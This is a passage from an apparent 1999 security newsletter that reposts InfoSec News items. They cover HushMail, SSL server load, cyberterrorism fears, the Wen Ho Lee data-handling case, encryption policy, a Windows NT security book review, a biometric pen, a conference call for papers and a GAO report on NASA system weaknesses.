assurance," the NSA said.The agency said the decision to launch the information-assurance program represented an attempt to reach out and form partnerships with industry pursuant to a Clinton administration directive last year on critical infrastructure protection.The seven centers will be formally recognized during a conference on information-security systems scheduled for May 25 to 29 at IBM's conference facility in Palisades, N.Y. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 31.0 [ISN] HushMail: free Web-based email with bulletproof encryption ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 22 May 1999 06:16:04 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] HushMail: free Web-based email with bulletproof encryption Forwarded From: Keith Dawson 1999-05-19: ..HushMail: free Web-based email with bulletproof encryption Hush Communications has quietly begun beta testing a significant development in email privacy. HushMail [1] works like Hotmail or Rocketmail -- you can set up multiple free accounts and access them from any Web browser anywhere -- but when you email another HushMail user your communication is protected by unbreakable encryption. The crypto, implemented in a downloadable Java applet, was developed outside of US borders and so has no export limitations. Here are the FAQ [2] and a more technical overview [3] of the Hush- Mail system. HushMail public and private keys are 1024 bits long, and are stored on a server located in Canada. All information sent between the HushApplet and the HushMail server is encrypted via the Blowfish symmetric 128-bit algorithm. The key to this symmetric pipe is randomly generated each session by the server and is transferred to the client machine over a secure SSL connection. When you sign on as a new user you can choose an anonymous account or an identifiable one. For the latter you have to fill out a demographic profile, to make you more attractive (in the aggregate) to HushMail's advertisers. The HushApplet walks you through generating a public-private key-pair. The process is fun and slick as a smelt. You need to come up with a secure pass-phrase, and in this process HushMail gives only minimal guidance. You might want to visit Arnold Reinhold's Diceware page [4], where he lays out a foolproof pass- phrase protocol utilizing a pair of dice. HushMail relies heavily on Java (JVM 1.1.5 or higher), so it can only be used with the latest browsers. The earliest workable version of Netscape's browser is 4.04, but some features don't work in versions before 4.07; the latest version, 4.5, is best. For Internet Explorer users, 4.5 is recommended, but the latest Windows release of IE 4.0 (subversion 4.72.3110) works as well. Red Hat Linux version 5.2 is also tested and supported. Unfortunately, HushMail does not work on Macintoshes, due to limitations in Apple's Java implementation. (Mac users can crawl HushMail under Connectix Virtual PC. Note that I don't say "run." I've tried this interpretation-under-emulation and do not recommend it.) The company is trying urgently to connect with the right people at Apple to get this situation remedied. One of the limitations of this early release of HushMail is that encryption can only be used to and from another HushMail account. It is not currently possible to export your public/private key-pair, to set up automatic forwarding of mail sent to a HushMail account, or to import non-Hush public keys. I spoke with Cliff Baltzley, Hush's CEO and chief technical wizard. He stresses that Hush's desire and intention is to move toward interoperability with other players in the crypto world, such as PGP and S/MIME. The obstacles to doing so are the constraints on technical resources (read: offshore crypto programmers) and legal questions of intellectual property. Baltzley believes that HushMail's positive impact on privacy worldwide will be enhanced by maximizing the product's openness. [1] https://www.hushmail.com/ [2] https://www.hushmail.com/faq.htm [3] https://www.hushmail.com/tech_description.htm [4] http://world.std.com/~reinhold/diceware.html -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 32.0 [ISN] E-Biz Bucks Lost Under SSL Strain ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 22 May 1999 06:17:04 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] E-Biz Bucks Lost Under SSL Strain http://www.internetwk.com/lead/lead052099.htm Thursday, May 20, 1999 E-Biz Bucks Lost Under SSL Strain By TIM WILSON A customer stuffs his shopping cart with goodies from your Web site. Credit card in hand, he waits for a secure connection to consummate the deal. And waits. Finally, short of patience, he dumps the contents and logs off. It may sound like an e-commerce manager's nightmare, but according to the latest Web server performance statistics, it's an increasingly common phenomenon. The ghost in the machine is Secure Sockets Layer, the commonly used method of securing communications between users and Web sites. Recent tests conducted by researcher Networkshop Inc. indicate that powerful Web servers capable of handling hundreds of transactions per second may be brought to a near standstill by heavy SSL traffic. Some server configurations suffered as much as a fiftyfold degradation in performance from SSL, down to just a few transactions per second, according to analyst Alistair Croll at Networkshop. The growing problem of SSL performance has driven vendors to develop devices that can help share the Web server's processing load. IPivot Inc. next month will ship two new processors that can offload authentication and encryption on e-commerce sites. IT managers and other experts have known for years that SSL, which requires the authentication and encryption of Web server connections, can significantly slow site performance. But the problem is rapidly becoming more chronic as companies increase secured Web transactions, they said. "Our business is very seasonal, and a lot of it is concentrated in the fourth quarter. This past December, we found ourselves shuffling servers around to handle the load," said Stephen McCollum, network architect at Hewitt Associates. The $858 million company manages benefits plans for large organizations, and because Hewitt's Web traffic is personal and confidential, virtually all of it is conducted via SSL. Hewitt is far from alone in its reliance on SSL. According to a study conducted by research company Netcraft Ltd., SSL implementations doubled from 15,000 sites to more than 35,000 sites between 1998 and 1999. And many of those server sites are struggling under the load. "I'd guess that somewhere between 10 and 25 percent of [e-commerce] transactions are aborted because of slow response times," said Rodney Loges, vice president of business development at Digital Nation, a Web hosting company. That translates to as much as $1.9 billion in lost revenue, using Forrester Research numbers for 1998 of $7.8 billion in e-retail sales. According to Networkshop, even the most powerful, general-purpose Web server hardware can be dragged down by large volumes of SSL traffic. In its most recent tests, the research company found that a typical Pentium server configuration running Linux and Apache, which at full capacity can handle about 322 connections per second of standard HTTP traffic, fell to about 24 connections per second when handling a full load of SSL traffic. A similar test conducted on a Sun 450 server running Solaris and Apache experienced even more trouble. The server handled about 500 connections per second of HTTP traffic at full capacity, but only about 3 connections per second when the traffic was secured via SSL. Networkshop tests of quad-processor configurations showed that those performance ratios scale to multiserver environments as well, Croll said. A few vendors, such as Rainbow Technologies Inc., have solved the problem by offloading security processing onto a dedicated co-processor card that slips into a server. But as SSL traffic increases, adding and managing co-processor boards becomes unwieldy, IT managers said. "We found that the [co-processor] cards were kind of a kludge, because they have to be added to every server," said Digital Nation's Loges. IPivot will begin shipping two external SSL processors--the Commerce Accelerator 1000 and the Commerce Director 8000, which includes IPivot's load-balancing system--to help eliminate SSL bottlenecks. The Commerce Accelerator 1000 is priced at $9,995; the Commerce Director 8000 costs $39,950. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 33.0 [ISN] Bracing for guerrilla warfare in cyberspace ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 22 May 1999 06:22:31 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] Bracing for guerrilla warfare in cyberspace [Moderator: Warning - A fair share of FUD in this article.] Forwarded From: Sunit Nangia http://www.cnn.com/TECH/specials/hackers/cyberterror/ Bracing for guerrilla warfare in cyberspace 'There are lots of opportunities; that's very scary' April 6, 1999 By John Christensen CNN Interactive (CNN) -- It is June, the children are out of school, and as highways and airports fill with vacationers, rolling power outages hit sections of Los Angeles, Chicago, Washington and New York. An airliner is mysteriously knocked off the flight control system and crashes in Kansas. Parts of the 911 service in Washington fail, supervisors at the Department of Defense discover that their e-mail and telephone services are disrupted and officers aboard a U.S. Navy cruiser find that their computer systems have been attacked. As incidents mount, the stock market drops precipitously, and panic surges through the population. Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism czar Richard A. Clarke fears is not just a threat, it has already happened. Much of the scenario above -- except for the plane and stock market crashes and the panic -- occurred in 1997 when 35 hackers hired by the National Security Agency launched simulated attacks on the U.S. electronic infrastructure. "Eligible Receiver," as the exercise was called, achieved "root level" access in 36 of the Department of Defense's 40,000 networks. The simulated attack also "turned off" sections of the U.S. power grid, "shut down" parts of the 911 network in Washington, D.C., and other cities and gained access to systems aboard a Navy cruiser at sea. At a hearing in November 1997, Sen. Jon Kyl, R-Arizona, chairman of a Senate technology subcommittee, reported that nearly two-thirds of U.S. government computers systems have security holes. "If somebody wanted to launch an attack," says Fred B. Schneider, a professor of computer science at Cornell University, "it would not be at all difficult." 'There are lots of opportunities' Although "Eligible Receiver" took place in the United States, which has about 40 percent of the world's computers, the threat of cyberterrorism is global. Consider: * During the Gulf War, Dutch hackers stole information about U.S. troop movements from U.S. Defense Department computers and tried to sell it to the Iraqis, who thought it was a hoax and turned it down. * In March 1997, a 15-year-old Croatian youth penetrated computers at a U.S. Air Force base in Guam. * In 1997 and 1998, an Israeli youth calling himself "The Analyzer" allegedly hacked into Pentagon computers with help from California teen-agers. Ehud Tenebaum, 20, was charged in Jerusalem in February 1999 with conspiracy and harming computer systems. * In February 1999, unidentified hackers seized control of a British military communication satellite and demanded money in return for control of the satellite. The report was vehemently denied by the British military, which said all satellites were "where they should be and doing what they should be doing." Other knowledgable sources, including the Hacker News Network, called the hijacking highly unlikely. "There are lots of opportunities," says Schneider. "That's very scary." 'The Holy Grail of hackers' President Clinton announced in January 1999 a $1.46 billion initiative to deal with U.S. government computer security -- a 40 percent increase over fiscal 1998 spending. Of particular concern is the Pentagon, the military stronghold of the world's most powerful nation. "It's the Holy Grail of hackers," says computer security expert Rob Clyde. "It's about bragging rights for individuals and people with weird agendas." Clyde is vice president and general manager of technical security for Axent Technologies, a company headquartered in Rockville, Maryland, that counts the Pentagon as one of its customers. The Defense Department acknowledges between 60 and 80 attacks a day, although there have been reports of far more than that. The government says no top secret material has ever been accessed by these intruders, and that its most important information is not online. But the frustration is evident. Michael Vatis, director of the FBI's National Infrastructure Protection Committee, told a Senate subcommittee last year that tracing cyberattacks is like "tracking vapor." 'A lot of clueless people' Schneider says the "inherently vulnerable" nature of the electronic infrastructure makes counterterrorism measures even more difficult. Schneider chaired a two-year study by the National Academy of Sciences and the National Academy of Engineering that found that the infrastructure is badly conceived and poorly secured. "There is a saying that the amount of 'clue' [knowledge] on the Internet is constant, but the size of the Internet is growing exponentially," says Schneider. "In other words, there are a lot of clueless people out there. It's basically a situation where people don't know how to lock the door before walking out, so more and more machines are vulnerable." Schneider says the telephone system is far more complicated than it used to be, with "a lot of nodes that are programmable, and databases that can be hacked." Also, deregulation of the telephone and power industries has created another weakness: To stay competitive and cut costs, companies have reduced spare capacity, leaving them more vulnerable to outages and disruptions in service. Still another flaw is the domination of the telecommunications system by phone companies and Internet service providers (ISPs) that don't trust each other. As a result, the systems do not mesh seamlessly and are vulnerable to failures and disruptions. "There's no way to organize systems built on mutual suspicion," Schneider says. "We're subtly changing the underpinnings of the system, but we're not changing the way they're built. We'll keep creating cracks until we understand that we need a different set of principles for the components to deal with each other." 'The democratization of hacking' Meanwhile, the tools of mayhem are readily available. There are about 30,000 hacker-oriented sites on the Internet, bringing hacking -- and terrorism -- within the reach of even the technically challenged. "You no longer have to have knowledge, you just have to have the time," Clyde says. "You just download the tools and the programs. It's the democratization of hacking. And with these programs ... they can click on a button and send bombs to your network, and the systems will go down." Schneider says another threat is posed not by countries or terrorists, but by gophers and squirrels and farmers. In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking out 60 percent of the regional and long distance phone service in New York City and air traffic control functions in Boston, New York and Washington. In 1996, a rodent chewed through a cable in Palo Alto, California, and knocked Silicon Valley off the Internet for hours. "Although the press plays up the security aspect of hacker problems," says Schneider, "the other aspect is that the systems are just not built very reliably. It's easy for operators to make errors, and a gopher chewing on a wire can take out a large piece of the infrastructure. That's responsible for most outages today." 'The prudent approach' Schneider and Clyde favor a team of specialists similar to Clinton's proposed "Cyber Corps" program, which would train federal workers to handle and prevent computer crises. But they say many problems can be eliminated with simple measures. These include "patches" for programs, using automated tools to check for security gaps and installing monitoring systems and firewalls. Fixes are often free and available on the Internet, but many network administrators don't install them. A step toward deterrence was taken in 1998 when CIA Director George Tenet announced that the United States was devising a computer program that could attack the infrastructure of other countries. "That's nothing new," says Clyde, "but it's the first time it was publicly announced. If a country tries to destroy our infrastructure, we want to be able to do it back. It's the same approach we've taken with nuclear weapons, the prudent approach." The U.S. Government Accounting Office estimates that 120 countries or groups have or are developing information warfare systems. Clyde says China, France and Israel already have them, and that some Pentagon intrusions have surely come from abroad. "We don't read about the actual attacks," says Clyde, "and you wouldn't expect to." "The Analyzer" was caught after he bragged about his feat in computer chat rooms, but Clyde says the ones to worry about are those who don't brag and don't leave any evidence behind. "Those are the scary ones," he says. "They don't destroy things for the fun of it, and they're as invisible as possible." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 34.0 [ISN] Prosecuting Lee Is Problematic ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 26 May 1999 00:05:43 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] Prosecuting Lee Is Problematic http://www.washingtonpost.com/wp-srv/WPlate/1999-05/24/080l-052499-idx.html Prosecuting Lee Is Problematic Physicist's Mishandling of Computer Data May Not Be Crime By Vernon Loeb and Walter Pincus Washington Post Staff Writers Monday, May 24, 1999; Page A05 Espionage suspect Wen Ho Lee's transfer of top secret computer programs from a classified to a vulnerable computer network at Los Alamos National Laboratory has left federal prosecutors wrestling with the question of whether such mishandling of classified information in cyberspace constitutes a crime. Lacking evidence of espionage, FBI agents have focused on Lee's unauthorized data transfer ever since they searched his desktop computer in March and discovered top secret "legacy codes" in a system that could have been accessed by hackers. But there is no known prosecution of anyone for transferring classified data from classified to unclassified government computer systems, leaving prosecutors to fathom the frontiers of cybersecurity under espionage statutes that make no reference to computers, according to lawyers specializing in national security law and U.S. officials familiar with the case. Lee, 59, a Taiwan-born nuclear physicist who is a U.S. citizen, was fired March 8 for alleged security violations at Los Alamos and identified by U.S. officials as an espionage suspect, despite their inability to charge him as a spy for China. Congress is investigating why the FBI and the Justice Department failed to search his office computer prior to his dismissal. That slow response drew more criticism yesterday. The chairman of the Senate intelligence committee, Richard C. Shelby (R-Ala.), renewed his call for the ouster of Attorney General Janet Reno. Branding her handling of the case "indefensible," Shelby said on CBS's "Face the Nation" that "the attorney general ought to resign and she ought to take her top lieutenants with her." On the same show, Sen. Robert G. Torricelli (D-N.J.) also criticized Reno, although he stopped short of advocating resignation: "It's time for President Clinton to have a conversation with the attorney general about her ability to perform her duties and whether or not it is in the national interest for her to continue." Torricelli said Reno had displayed "failures of judgment" that were "inexplicable." He singled out her decision not to approve a wire tap of Lee "despite overwhelming evidence that there was probable cause and that the national security was being compromised." White House spokesman Barry Toiv said Clinton "has full confidence in Attorney General Reno," Reuters reported. Lee has denied passing classified information to China and has said through his attorney he took "substantial steps" to safeguard the transferred computer codes. A provision of the federal espionage statute makes the removal of classified defense information from its "proper place of custody" through "gross negligence" a felony punishable by up to 10 years in prison, according to lawyers specializing in national security cases. But it is unclear whether Lee could be charged under that provision, absent intent on his part to make unlawful use of the data or evidence it was obtained by unauthorized individuals, they said. "You've got a clear security breech," said former CIA inspector general Frederick Hitz. "But as far as a criminal prosecution . . . I would think that's going to be tough." Another law makes the "unauthorized removal and retention of classified documents or material" at one's home a misdemeanor punishable by a maximum $1,000 fine and one-year prison sentence. The measure was enacted to safeguard classified materials against careless handling, not espionage. Two former National Security Agency employees, a husband and wife, were the first to be prosecuted under the law last year, pleading guilty to having retained classified documents at their home after leaving government service. But the lawyers specializing in national security cases say they do not believe the statute could be used against Lee, because he apparently did not remove the programs from government property. They said in two recent cases involving computer transfers of classified information, one involving another Los Alamos scientist and the other, former CIA director John M. Deutch, the Justice Department declined prosecution. The scientist at Los Alamos, who has not been publicly identified, moved classified nuclear weapons data last year from the laboratory's classified to its unclassified network in a transfer analogous to that performed by Lee. But the transfer was ultimately determined to have been "inadvertent," according to a senior Energy Department official. The FBI found no criminal intent and closed the case, the official said. Deutch was investigated by the Justice Department for transferring more than 30 classified documents to his personal, unsecured laptop during his tenure as CIA director from May 1995 to December 1996. The security breach was discovered when CIA specialists went to his Washington home to remove a classified computer and safe and discovered the classified files on his personal computer. Under CIA policy, Deutch's security violation was forwarded to Justice for review, but officials there declined prosecution. The case was recently recently returned to the CIA for review by Inspector General Britt Snider, who is expected to complete a report on the matter soon. Deutch, who does government consulting and teaches at Massachusetts Institute of Technology, could have his security clearance lifted for a period of time, one government source said. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 35.0 [ISN] Slip of the Tongue Lightens up Encryption Hearing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 26 May 1999 00:01:24 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] Slip of the Tongue Lightens up Encryption Hearing http://www.nytimes.com/library/tech/99/05/cyber/articles/25capital.html May 25, 1999 Slip of the Tongue Lightens up Encryption Hearing By JERI CLAUSING WASHINGTON -­ The Clinton Administration's point man on encryption policy silenced his Congressional critics ­- momentarily, anyway -- with a slip of the tongue at a House hearing last week. "Never underestimate the stupidity of some of the people we have to deal with," William A. Reinsch, Under Secretary of Commerce for the Bureau of Export Administration, said while being grilled about whether terrorists and criminals would be naïve enough to use the technology being pushed by the Administration. The House International Relations subcommittee meeting fell silent and Reinsch turned bright red as he realized the double meaning of what he had said. As the silence turned to laughter, Reinsch tried to backtrack, blurting, "I didn't say that." But it was enough to silence Representative Bradley J. Sherman. Sherman promptly ended his grilling of Reinsch, who along with representatives of the National Security Agency and the Federal Bureau of Investigation, was testifying in defense of the Administration's encryption policy. The Administration has tied any loosening of export controls on strong encryption to the development of technology that would guarantee law enforcement easy access to criminals' communications. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 36.0 [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control", ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 26 May 1999 00:03:24 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control", Forwarded From: "Rob Slade" BKWNTSAC.RVW 990409 "Microsoft Windows NT 4.0 Security, Audit, and Control", James G. Jumes et al, 1999, 1-57231-818-X, U$49.99/C$71.99/UK#45.99 %A James G. Jumes %A Neil F. Cooper %A Paula Chamoun %A Todd M. Feinman %C 1 Microsoft Way, Redmond, WA 98052-6399 %D 1999 %G 1-57231-818-X %I Microsoft Press %O U$49.99/C$71.99/UK#45.99 800-6777377 fax: 206-936-7329 %P 318 p. %S Technical Reference %T "Microsoft Windows NT 4.0 Security, Audit, and Control" The primary audience described in the introduction seems to be security professionals. However, system administrators, technology managers, and CIOs are mentioned as well. The attempt at breadth of coverage usually does not bode well in works like these. Chapter one discusses an information security model based upon the business (and other) objectives of the institution in question. While valid as far as it goes, and even possibly helpful when formulating security policy, this by no means provides a structure from which to view either security policy or procedures, let alone implement a complex set of controls. The widget company, beloved of management writers, is described in chapter two. For the purposes of assessing security in real world working environments, this particular widget company seems to be astoundingly simple and homogeneous. Chapter three starts out talking reasonably about security policy, starts to get flaky in risk assessment (I would definitely worry about a .45 chance of an earthquake), and tails off into trivia. Monitoring, in chapter four, looks first at system performance and diagnostics, and then gets into event logging without really going into the concepts. Many areas of physical security are left uncovered in chapter five. Chapter six discusses domains, trust relationships, and remote access permissions. Dialogue boxes for user accounts and groups are listed in chapter seven. There is some mention of the commonly "received wisdom" in regard to these topics, as there is in chapter eight regarding account policies, but nothing very significant. File system, share, and other resource control is covered in chapter nine. Chapter ten is a bit of a grab bag without much focus. The registry is reviewed in chapter eleven. Chapter twelve looks briefly at power supplies and backups. Although it talks about auditing, chapter thirteen is more of a checklist of security features to think about. Appendix A is a bit better in this regard: it lists recommended settings across a number of functions for six different types of systems. There is some discussion of options as the various functions are addressed, so, in a sense, this is a start towards full coverage of NT security. It has a long way to go, though. In addition, the deliberation comes at the cost of a loss of some detail in terms of security implementation. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 37.0 [ISN] LCI Intros SMARTpen Biometric Signature Authentication ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 26 May 1999 01:22:36 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] LCI Intros SMARTpen Biometric Signature Authentication Forwarded From: 7Pillars Partners LCI Intros SMARTpen Biometric Signature Authentication S'HERTGENBOSCH, NETHERLANDS, 1999 MAY 24 (NB) By Sylvia Dennis, Newsbytes. LCI Technology has taken the wraps off its SMARTpen biometric signature authentication system. The SMARTpen is billed as the world's first wireless signature device and the only biometric unit of its type that writes on normal paper.Sam Asseer, the firm's chairman, said that the unit was designed for high-end security transactions. It is, he explained, a wireless embedded computer system that looks and writes like a common ballpoint pen. In use, the SMARTpen uses built-in sensors that enable the authentication of users through the biometric characteristics of their signatures on regular paper. "Electronic commerce is rapidly becoming the way the world does business," he said, adding that the surge in online transactions over the past two years and the predictions for explosive growth going into the year 2000 suggests that the future of e-commerce is unlimited. "But, as the number of Internet transactions increases, there is an even greater demand for security to ensure confidentiality and prevent fraud. Biometric authentication systems like the LCI SMARTpen help create the secure environment necessary for the continued expansion of global e-commerce," he said. According to the firm, the SMARTpen measures individual signature characteristics, encrypts the data and transmits it via radio frequency to a computer, where LCI software compares it to a template for verification - all in about three seconds. The firm claims that the dynamics of signatures as measured by the SMARTpen are personal and not directly visible from the written image. This, the firm says, makes it virtually impossible for forged signatures to get through the SMARTpen system. The system works with standard APIs (application programming interfaces) and the false rejection/false acceptance rate can be adjusted by system parameters, so adding flexibility. Pricing on the SMARTpen is expected to range from $100 to $250, depending on the model and configuration of the product. According to LCI, the price includes the pen and software components. The SMARTpen also has integral sensors, a mouse, a digital signal processor, radio transmitter and receiver, and encryption system. LCI's Web site is at http://www.smartpen.net . -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 38.0 [ISN] CFP: DISC 99 Computer Security 99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 27 May 1999 02:31:07 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] CFP: DISC 99 Computer Security 99 Forwarded From: Juan Carlos Guel Lopez .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' ____ ___ ____ ____ ___ ___ | _ \_ _/ ___| / ___| / _ \ / _ \ | | | | |\___ \| | | (_) | (_) | | |_| | | ___) | |___ \__, |\__, | |____/___|____/ \____| /_/ /_/ C o m p u t e r S e c u r i t y 9 9 "Working Together" October 4-8, 1999 Palacio de Miner'ia, M'exico City, M'exico. .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' C A L L F O R P A R T I C I P A T I O N The goal of Computer Security 99 (DISC 99) is to create awareness in the computer user community about security strategies and mechanisms used to protect information. For the second consecutive year the DISC takes place alongside the most important computing event of Mexico, the computing general congress Computo.99@mx (http://www.computo99.unam.mx/), and invites specialists in computer security to participate. "Working Together" is the slogan for this year's event, suggesting that security in the organization can only exist and be increased with the work of all the people in the organization, including users, management and security personnel. The community is invited to participate in the DISC 99 event through the presentation of theoretical, technical, and applied works and those who presents practical experience in the following topics (but not limited to them): @ > Electronic commerce - Certification - Digital cash - New protocols - Secure transactions @ > New Firewall technologies @ > World Wide Web security - Secure Sockets Layer (SSL) @ > Network security @ > Security for software developers @ > Security in distributed systems and data bases @ > Security in agents and multi-platform languages @ > Incident response teams @ > Computer security incident handling, prevention and coordination @ > Administrative and legal issues in the incident handling @ > Software protection and intellectual property @ > New tools for incident handling @ > Attacks and intrusion detection @ > Computer attacks @ > Privacy and cryptography protocols @ > Security policies ....................... Who should attend ? ....................... * System administrators who are interested in Computer Security. * People working in the field of Computer Security, and handling Computer Security incidents. * Anybody who is interested in Computer Security and wants to meet another interested people. This event will help him or her to improve security programs, security plans, and security tools by sharing and getting a wide experience and knowledge. * People who want to establish incident response teams. * Anybody who has a particular interest in network security, monitoring tools, intrusion detection and firewalls. ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' Important Dates ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' Paper submissions: July 2 Acceptance notification: August 6 Final papers due: August 20 Event Dates: October 4-8 ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' Workshop Format ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' There will be tutorial-style presentations during October 4 and 5. October 6, 7 and 8 will consist of conference papers and workshop-style presentations, as well as business sessions. Two evenings are allocated for participants to hold events devoted to subjects of particular interest ("birds of a feather" sessions). Contributions should follow the following guidelines: 1. Tutorials: Half or full day tutorial proposals will be considered. 2. Papers: Written papers may be as long as desired, but presentations must be limited to 30 minutes. 3. Workshops: These informal sessions should either follow a more "hands-on" approach or provide for a high degree of audience participation. They should be tailored to address specific issues and should be from 60 to 90 minutes in duration. Panel Sessions on a particular topic are also acceptable. ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' Instruction for authors ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' We will receive proposals for presentations, workshops and tutorials that follow these guidelines: * The documents should be delivered by the indicated date. * The contents of the documents should be high-quality and original. It should also include an abstract that describes the content and style of the presentation. * The papers will be evaluated using the proposal, which has to contain: - title - format (workshop, tutorials or conference) - extended abstract (more than one but less than two pages) - requirements for the presentation (computing equipment, data projector, slide projector, etc.) - author information - name - address and affiliation - brief resume - fax and telephone number - e-mail address * For tutorials, the following information should also be included: - goal - introduction and summary - outline of the presentation - duration (half or full day) - presentation material (slides) .................... Accepted formats .................... Authors whose papers are accepted must submit the complete paper to be include into the C'omputo.99@mx proceedings. Submissions will be accepted in the following formats: - TeX/LaTeX - PostScript - Word for Windows - ASCII - Please contact the committee (disc99@asc.unam.mx) if you need to use a different format. Note: The specifications of the papers such as margins, font size and line spacing will be specified in the DISC 99 WWW page at: http://www.asc.unam.mx/disc99-i/convocatoria.html ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' Program Committee ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' President: -> Dr. Enrique Daltabuit Centro Tecnologico, ENEP-Aragon, UNAM -> M. en C. Diego Zamboni CERIAS, Purdue University -> Nicholas P. Cardo Lawrence Berkeley National Laboratory Computational Systems Group ............... Submissions ............... Presentations can be delivered using the following means: o E-mail (disc99@asc.unam.mx) o Post mail to the following address: Area de Seguridad en C'omputo Direcci'on General de C'omputo Acad'emico Circuito Exterior, Ciudad Universitaria 04510 M'exico, D.F. MEXICO <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> Further Information ------------------- E-mail : disc99@asc.unam.mx WWW : http://www.asc.unam.mx/disc99-i/convocatoria.html Address : 'Area de Seguridad en C'omputo Direcci'on General de C'omputo Acad'emico Circuito Exterior, Ciudad Universitaria 04510 Mexico, D.F. MEXICO Telephone Number : (52-5) 622 81 69 and (52-5) 685 22 29 Fax : (52 5) 6 22 80 43 Subject: DISC 99 <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 39.0 [ISN] GAO: NASA systems full of holes. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 27 May 1999 02:56:28 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] GAO: NASA systems full of holes. From: anon http://www.fcw.com/pubs/fcw/1999/0524/fcw-newsnasa-5-24-99.html MAY 24, 1999 GAO: NASA systems full of holes BY DIANE FRANK (diane_frank@fcw.com) Out-of-date information security policies have left significant vulnerabilities in NASA's mission-critical systems that could allow unauthorized users to steal, modify or delete important operational data, according to a General Accounting Office report released last week. GAO, working over the past year with experts from the National Security Agency and using nothing more than public Internet access, was able to gain access to several unclassified mission-critical systems, including those supporting the command and control of spacecraft. According to GAO, NASA has not created enough awareness among its employees about common security mistakes and vulnerabilities, such as easily guessed passwords. NSA initially breached some systems using passwords such as "guest" for guest accounts and "adm" for system administrators, opening the door for broader access to agency systems. "The way we got in was through commonly known security faults," said John de Ferrari, assistant director of the Accounting and Information Management Division at GAO. GAO concluded that it was able to penetrate systems because NASA does not have a consistent information security management policy that the entire agency follows. "A lot of what needs to be done is awareness-related; you never seem to get enough awareness of computer security," de Ferrari said. GAO found that NASA did not have many policies regarding Internet and network security, and some policies the agency did have were out of date or were not followed. "We Had Become Quite Lax" "The fact of the matter is, we had become quite lax in the agency in terms of passwords," said Lee Holcomb, NASA's chief information officer. NASA now is scanning user passwords for ones that could be easily cracked and to check new passwords for vulnerabilities. "We take very seriously our responsibility for safeguarding our IT assets, and after Y2K, security is our No. 1 priority," Holcomb said. "They acknowledge that they did not succeed in penetrating several systems, but the fact that they did succeed is troubling to us. It is a wake-up call to the agency." This report is an important addition to the work already occurring throughout government to raise awareness of security needs, said Paul Rodgers, senior executive at the Critical Infrastructure Assurance Office, which is leading the national effort to protect critical systems. "The dangers are increasing, and we think the GAO report delivers an important message to NASA and other agencies," Rodgers 